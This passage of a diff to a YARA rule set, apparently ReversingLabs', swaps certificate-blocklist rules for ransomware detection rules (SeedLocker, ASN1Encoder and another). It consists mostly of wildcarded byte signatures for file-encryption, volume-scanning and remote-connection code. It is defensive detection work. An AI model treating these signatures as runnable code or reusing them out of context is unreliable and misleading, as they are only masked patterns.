+            F7 F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 8B CF E8 ?? ?? ?? ?? 85 C0 74
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF D3 83
+            C4 ?? 56 57 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 83 C4 ??
+            6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? B9 ?? ?? ?? ?? FF 0D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 3C 85 ?? ?? ?? ?? 40 99 F7
+            F9 89 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 85 FF 0F 85 ?? ?? ?? ?? 5E 5B 33 C0 5F C2
+        }
+		$find_volumes_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56
+            57 E8 ?? ?? ?? ?? 6A ?? 8D 84 24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 6A ?? 50 C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
+            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ??
+            ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84
+            24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ??
+            ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24
+            ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 83 C4 ?? 89 74 24 ?? 33
+        }
+		$find_volumes_p2 = {
+            FF 8B 5C BC ?? 53 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 9C B4 ?? ?? ?? ?? 46 47 83 FF
+            ?? 7C ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 57 FF 15 ??
+            ?? ?? ?? 8B D8 0F 1F 00 85 F6 74 ?? 8D 44 24 ?? 50 6A ?? 8D 84 24 ?? ?? ?? ?? 50 57
+            FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 74
+            ?? 4E 57 FF B4 B4 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? FF
+            D7 33 D2 B9 ?? ?? ?? ?? F7 F1 68 ?? ?? ?? ?? 80 C2 ?? 88 94 34 ?? ?? ?? ?? FF D3 46
+            83 FE ?? 7C ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 83 C4 ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 FF 15
+        }
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 5F C9 C3 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ??
+            8B CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ??
+            8B 43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B EB ?? 33 FF 57 57
+            57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 8B 4D ?? 8B 55 ?? 53 57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ??
+            ?? ?? 8A 01 88 85 ?? ?? ?? ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8
+            ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ??
+            3C ?? 8A C3 75 ?? B0 ?? 2B CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D
+        }
+		$find_files_p2 = {
+            56 1B C0 89 9D ?? ?? ?? ?? 23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 8D ?? ?? ?? ?? F7 D8 1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ??
+            ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            D8 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D
+            ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ??
+            75 ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ??
+            ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ??
+            ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2
+            C1 F8 ?? 3B C8 74 ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? EB ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            59 8B D8 56 FF 15 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 59 8B C3 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unique Digital Services Ltd." and ( pe.signatures [ i ] . serial == "00:66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" or pe.signatures [ i ] . serial == "66:1b:a8:f3:c9:d1:b3:48:41:34:84:e9:a4:95:02:f7" ) and 1594942800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_volumes_p* ) ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_51Aead5A9Ab2D841B449Fa82De3A8A00 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Seedlocker : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects SeedLocker ransomware."
 		author = "ReversingLabs"
-		id = "c4909945-f2f1-53b2-b438-edf411fda7ed"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "efa3dd2e-faf4-5882-aef8-85189e65f0f9"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4950-L4966"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e53095aab9d6c2745125e8cd933334ebc2e51a9725714d31a46baa74b8e42ed9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win64.Ransomware.SeedLocker.yara#L1-L91"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a478efcfb03e3eeebe72d9a71629456cf061c3c779fbdde99539854caf8c7c33"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "SeedLocker"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            48 89 5C 24 ?? 48 89 7C 24 ?? 55 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B
+            05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 48 8B F9 4C 8D 05 ?? ?? ?? ?? 4C 8B C9
+            BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8D 8D ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 48 8B D8 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 44 24 ?? 4C 8B CF 4C 8D 05 ?? ?? ?? ?? 48 89 44 24
+            ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? F6 44 24 ?? ?? 48 8D 8D ??
+            ?? ?? ?? 74 ?? 48 8D 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? EB ?? FF 15 ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B CB FF 15 ?? ?? ?? ?? 85 C0 0F 85
+            ?? ?? ?? ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 48 8B 8D ?? ?? ??
+            ?? 48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 7B ?? 49 8B E3
+            5D C3
+        }
+		$encrypt_files_p1 = {
+            FF 15 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 63 C8 48 8D 85 ?? ?? ??
+            ?? 48 8D 04 48 48 83 C0 ?? 66 83 38 ?? 75 ?? 45 33 FF 4C 8D 05 ?? ?? ?? ?? 66 44 89
+            38 45 33 C9 48 83 C0 ?? 4C 89 7C 24 ?? 48 89 05 ?? ?? ?? ?? 33 D2 48 8D 05 ?? ?? ??
+            ?? 44 89 7C 24 ?? 33 C9 48 89 05 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 45 8D 47 ?? 33
+            C9 FF 15 ?? ?? ?? ?? 48 8B F0 48 85 C0 74 ?? 48 8B 1D ?? ?? ?? ?? 48 81 C3 ?? ?? ??
+            ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 48 8B D3 48 8B CE 44 8B F0 FF
+            15 ?? ?? ?? ?? 48 8B F8 48 85 C0 74 ?? 4C 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8
+            FF 15 ?? ?? ?? ?? 48 8B CF FF 15 ?? ?? ?? ?? 41 8D 46 ?? 48 63 C8 48 8D 1C 4B 66 44
+            39 3B 75 ?? 48 8B CE FF 15 ?? ?? ?? ?? 33 D2 8D 4A ?? FF 15 ?? ?? ?? ?? 48 8B F8 48
+            83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 48 8B 1D ?? ?? ?? ?? 48 81
+            C3 ?? ?? ?? ?? EB ?? 48 8B CB FF 15 ?? ?? ?? ?? 48 8B D3 48 8D 4C 24 ?? 44 8B F0 FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? 44 8B 44 24 ?? 8D 48 ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B F0
+            48 83 F8 ?? 74 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B CE FF 15 ?? ?? ?? ?? 41 8D
+            46 ?? 48 63 C8 48 8D 1C 4B 66 44 39 3B 75 ?? 48 8D 54 24 ?? 48 8B CF FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 48 8B CF FF 15 ?? ?? ?? ?? 33 D2 48 8D 8D ?? ?? ?? ?? 41 B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2 48 8D 35 ?? ?? ?? ?? 48
+        }
+		$encrypt_files_p2 = {
+            8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8B 05 ?? ?? ??
+            ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 4C 89 BD
+            ?? ?? ?? ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ?? ?? 33 D2 FF
+            15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 48 8D 44 24 ?? 45
+            33 C9 45 33 C0 48 89 44 24 ?? 8D 53 ?? 33 C9 FF 15 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ??
+            48 8D 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ??
+            ?? 3D ?? ?? ?? ?? 75 ?? 44 8B CB C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 48 8D 8D ?? ?? ??
+            ?? 33 D2 FF 15 ?? ?? ?? ?? 48 8B BD ?? ?? ?? ?? 48 85 FF 0F 84 ?? ?? ?? ?? 48 8B 0D
+            ?? ?? ?? ?? 41 8B DF 48 81 C1 ?? ?? ?? ?? 45 8B F7 FF 15 ?? ?? ?? ?? 85 C0 7E ?? 49
+            8B F7 48 8B 05 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F BE 8C 06 ?? ?? ??
+            ?? 44 0F BE 8C 06 ?? ?? ?? ?? 89 4C 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 D2
+            48 8D 8D ?? ?? ?? ?? 44 8D 42 ?? E8 ?? ?? ?? ?? 8B CB 48 8D 76 ?? FF C3 41 83 C6 ??
+            88 84 0D ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 81 C1 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 44
+        }
+		$encrypt_files_p3 = {
+            3B F0 7C ?? 48 8D 35 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 48 89 44 24 ?? 48 8D
+            95 ?? ?? ?? ?? 44 8B C3 44 89 7C 24 ?? 48 8B CF FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ??
+            ?? ?? 48 8B 1D ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8B 15 ?? ?? ?? ?? 4C 8B C3 E8 ??
+            ?? ?? ?? 48 8B 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 45 33 C9 C7 44 24 ?? ?? ?? ?? ??
+            48 89 44 24 ?? 33 D2 48 8D 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 48 89 44 24 ?? 45 8D 41
+            ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 41 8B DF 44 39 BD ?? ?? ?? ?? 76 ?? 8B C3 4C 8D 05
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 44 0F B6 8C 05 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF C3 3B 9D ?? ??
+            ?? ?? 72 ?? 48 8B 8D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 D2 48 8B CF FF 15 ?? ?? ?? ??
+            48 8B 05 ?? ?? ?? ?? 4C 8D 8D ?? ?? ?? ?? 48 83 C0 ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 89 44 24 ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 06 00 48
+            8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 66 44 89 BD ?? ?? 00 00 F3 0F 7F 85 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            48 8D 8D ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 48 8B 8D ?? ?? ?? ??
+            48 33 CC E8 ?? ?? ?? ?? 4C 8D 9C 24 ?? ?? ?? ?? 49 8B 5B ?? 49 8B 73 ?? 49 8B 7B ??
+            49 8B E3 41 5F 41 5E 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Corsair Software Solution Inc." and pe.signatures [ i ] . serial == "51:ae:ad:5a:9a:b2:d8:41:b4:49:fa:82:de:3a:8a:00" and 1501577475 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $search_files and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03B630F9645531F8868Dae8Ac0F8Cfe6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Asn1Encoder : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects ASN1Encoder ransomware."
 		author = "ReversingLabs"
-		id = "be945687-9b8c-5d84-9992-fd317eddae54"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "5fa361e5-4ab0-5856-92b2-6f434e33c350"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4968-L4984"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6d2f4346760bf52a438c4c996e92a2641bebfd536248776383d7c8394e094e6a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.ASN1Encoder.yara#L1-L136"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "000fd846fa5f09af19ead4623bb5a8eb51cdb4c751013569bf070710d3e0d61d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "ASN1Encoder"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection_p1 = {
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 0F B6
+            84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ??
+            83 C4 ?? 83 C3 ?? 46 83 FE ?? 72 ?? 8B 5C 24 ?? BE ?? ?? ?? ?? A1 ?? ?? ?? ?? 53 50
+            68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50
+            E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 8B F0 85 FF 74 ?? A1 ?? ?? ?? ?? 0F B6 04 06 50 B8 ??
+            ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 83 C3 ?? 46 3B F7
+            72 ?? 8B 5C 24 ?? A1 ?? ?? ?? ?? BE ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? 56 50 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 50 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B FB 8B F0 0F B6
+            84 34 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? 2B C6 68 ?? ?? ?? ?? 03 C0 50 57 E8 ?? ?? ?? ??
+            83 C4 ?? 83 C7 ?? 46 83 FE ?? 72 ?? A1 ?? ?? ?? ?? 53 50 68 ?? ?? ?? ?? BB ?? ?? ??
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ?? ??
+            ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68 ??
+            ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 83 C4 ?? 33 F6 8D 51 ?? 66 8B 01
+            83 C1 ?? 66 3B C6 75 ?? 2B CA 8B 15 ?? ?? ?? ?? D1 F9 8D 72 ?? 8A 02 42 84 C0 75 ??
+            8B 3D ?? ?? ?? ?? 2B D6 8D 04 0A 8D 34 45 ?? ?? ?? ?? 56 6A ?? FF D7 50 FF 15 ?? ??
+            ?? ?? 8B D8 8D 04 36 50 6A ?? 89 5C 24 ?? FF D7 50 FF 15 ?? ?? ?? ?? FF 35 ?? ?? ??
+            ?? 8B F8 FF 35 ?? ?? ?? ?? 89 7C 24 ?? 68 ?? ?? ?? ?? 56 53 E8 ?? ?? ?? ?? 33 C9 89
+        }
+		$remote_connection_p2 = {
+            44 24 ?? 83 C4 ?? 89 8C 24 ?? ?? ?? ?? 8B D9 85 C0 7E ?? 8B 44 24 ?? 0F B7 04 58 66
+            89 84 24 ?? ?? ?? ?? 83 F8 ?? 75 ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? BE
+            ?? ?? ?? ?? 83 C3 ?? A5 A5 66 A5 EB ?? 8D 94 24 ?? ?? ?? ?? 8B F2 66 8B 02 83 C2 ??
+            66 3B C1 75 ?? 2B D6 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3
+            A5 8B CA 83 E1 ?? F3 A4 33 C9 8B 7C 24 ?? 43 3B 5C 24 ?? 7C ?? FF 74 24 ?? 51 FF 15
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 50 FF D6 FF 35 ?? ?? ?? ?? 33 C0 50 FF 15 ?? ?? ?? ??
+            50 FF D6 8B 5C 24 ?? 53 33 DB 53 FF 15 ?? ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ??
+            ?? ?? ?? 50 FF D6 FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF D6 8B 5C 24 ?? 89 3D ?? ??
+            ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 33 FF E9 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ??
+            83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? 85 C0
+            0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 8B F3 89 5C 24 ?? 8D 4E ?? 8A 06 46 84
+            C0 75 ?? 8B 3D ?? ?? ?? ?? 2B F1 68 ?? ?? ?? ?? 6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 89
+            44 24 ?? 85 DB 0F 84 ?? ?? ?? ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? FF D7 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ??
+            ?? ?? BA ?? ?? ?? ?? C1 E8 ?? 50 E8 ?? ?? ?? ?? 59 8D 94 24 ?? ?? ?? ?? 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8B C8 8B F8 3B FE 73 ?? 81 F9 ?? ?? ?? ?? 74 ?? FF 74
+            24 ?? 8D 84 24 ?? ?? ?? ?? 50 8D 04 1F 50 E8
+        }
+		$encrypt_files_p1 = {
+            8B CA 8D 84 24 ?? ?? ?? ?? C1 E9 ?? F3 A5 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 8B CA 83
+            E1 ?? 68 ?? ?? ?? ?? F3 A4 50 FF 15 ?? ?? ?? ?? 8B D8 33 FF 89 5C 24 ?? 89 3D ?? ??
+            ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 44
